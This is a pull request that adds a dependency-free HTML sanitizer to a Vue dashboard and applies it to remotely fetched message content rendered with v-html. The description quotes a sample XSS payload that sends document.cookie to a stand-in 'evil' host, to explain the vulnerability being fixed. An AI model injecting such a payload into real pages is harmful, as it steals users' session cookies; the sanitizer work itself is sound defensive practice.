### PR TITLE
fix: sanitize remote message content to prevent XSS

### DIFF
--- a/src/components/Message.vue
+++ b/src/components/Message.vue
@@ -15,6 +15,8 @@
 </template>
 
 <script>
+import { sanitizeHtml } from "@/utils/sanitize.js";
+
 export default {
   name: "Message",
   props: {
@@ -49,6 +51,12 @@ export default {
         let fetchedMessage = await this.downloadMessage(this.item.url);
         if (this.item.mapping) {
           fetchedMessage = this.mapRemoteMessage(fetchedMessage);
+        }
+
+        // Content fetched from a remote endpoint is untrusted, so sanitize it
+        // before it ends up in a v-html binding to avoid XSS.
+        if (typeof fetchedMessage.content === "string") {
+          fetchedMessage.content = sanitizeHtml(fetchedMessage.content);
         }
 
         // keep the original config value if no value is provided by the endpoint

--- a/src/utils/sanitize.js
+++ b/src/utils/sanitize.js
@@ -1,0 +1,72 @@
+// Minimal HTML sanitizer used for content coming from remote sources.
+//
+// Message content can be fetched from an arbitrary endpoint and is rendered
+// with `v-html`. Such content is outside of the user's own config and must
+// therefore be treated as untrusted: without sanitizing it, a remote endpoint
+// could inject scripts or event handlers and run arbitrary JS in the dashboard
+// (XSS). We strip anything that can execute code while keeping basic markup so
+// the documented "content accepts HTML" behaviour still works for endpoints.
+
+// Tags that should never make it through, regardless of attributes.
+const FORBIDDEN_TAGS = ["script", "style", "iframe", "object", "embed", "link"];
+
+// Allow http(s), mailto and relative URLs only, blocking things like
+// `javascript:` or `data:` URIs that can be used to execute code.
+const SAFE_URL = /^(?:https?:|mailto:|\/|\.\/|\.\.\/|#)/i;
+
+function sanitizeNode(node) {
+  // Drop comment nodes, they can be abused by some parsers.
+  if (node.nodeType === Node.COMMENT_NODE) {
+    node.remove();
+    return;
+  }
+
+  if (node.nodeType !== Node.ELEMENT_NODE) {
+    return;
+  }
+
+  if (FORBIDDEN_TAGS.includes(node.tagName.toLowerCase())) {
+    node.remove();
+    return;
+  }
+
+  for (const attr of [...node.attributes]) {
+    const name = attr.name.toLowerCase();
+    const value = attr.value;
+
+    // Strip every inline event handler (onclick, onerror, onload, ...).
+    if (name.startsWith("on")) {
+      node.removeAttribute(attr.name);
+      continue;
+    }
+
+    // Only allow safe URLs for attributes that can trigger navigation/loading.
+    if (
+      (name === "href" || name === "src" || name === "xlink:href") &&
+      !SAFE_URL.test(value.trim())
+    ) {
+      node.removeAttribute(attr.name);
+    }
+  }
+
+  for (const child of [...node.childNodes]) {
+    sanitizeNode(child);
+  }
+}
+
+export function sanitizeHtml(html) {
+  if (typeof html !== "string" || html === "") {
+    return html;
+  }
+
+  const template = document.createElement("template");
+  template.innerHTML = html;
+
+  for (const child of [...template.content.childNodes]) {
+    sanitizeNode(child);
+  }
+
+  return template.innerHTML;
+}
+
+export default sanitizeHtml;


### PR DESCRIPTION
### What

The dashboard "message" can fetch its content from a remote endpoint (`message.url`), and that content is rendered with `v-html` in `Message.vue`. Right now the fetched content is injected as-is, with no sanitization.

Since the endpoint is a separate trust boundary from the user's own `config.yml`, a remote message endpoint can return markup such as:

```json
{ "content": "<img src=x onerror=\"fetch('https://evil/'+document.cookie)\">" }
```

and run arbitrary JavaScript in the dashboard origin (XSS). This is easy to hit in practice because people often point the message at a third-party/shared status service.

### Fix

- Add a small, dependency-free sanitizer (`src/utils/sanitize.js`) that:
  - removes `script`/`style`/`iframe`/`object`/`embed`/`link` tags and HTML comments,
  - strips inline event handlers (`on*`),
  - drops `href`/`src` values that aren't `http(s):`, `mailto:`, relative, or `#` anchors (blocking `javascript:` / `data:`).
- Run it on the **content fetched from the endpoint** in `Message.vue`.

HTML set directly in the local `config.yml` is the user's own trusted input and is intentionally left untouched, so the documented "content accepts HTML" behavior keeps working.

### Notes

- `pnpm lint` and `pnpm build` both pass.
- I kept this dependency-free on purpose to match the project's minimal footprint; happy to switch to DOMPurify instead if you'd prefer a battle-tested library.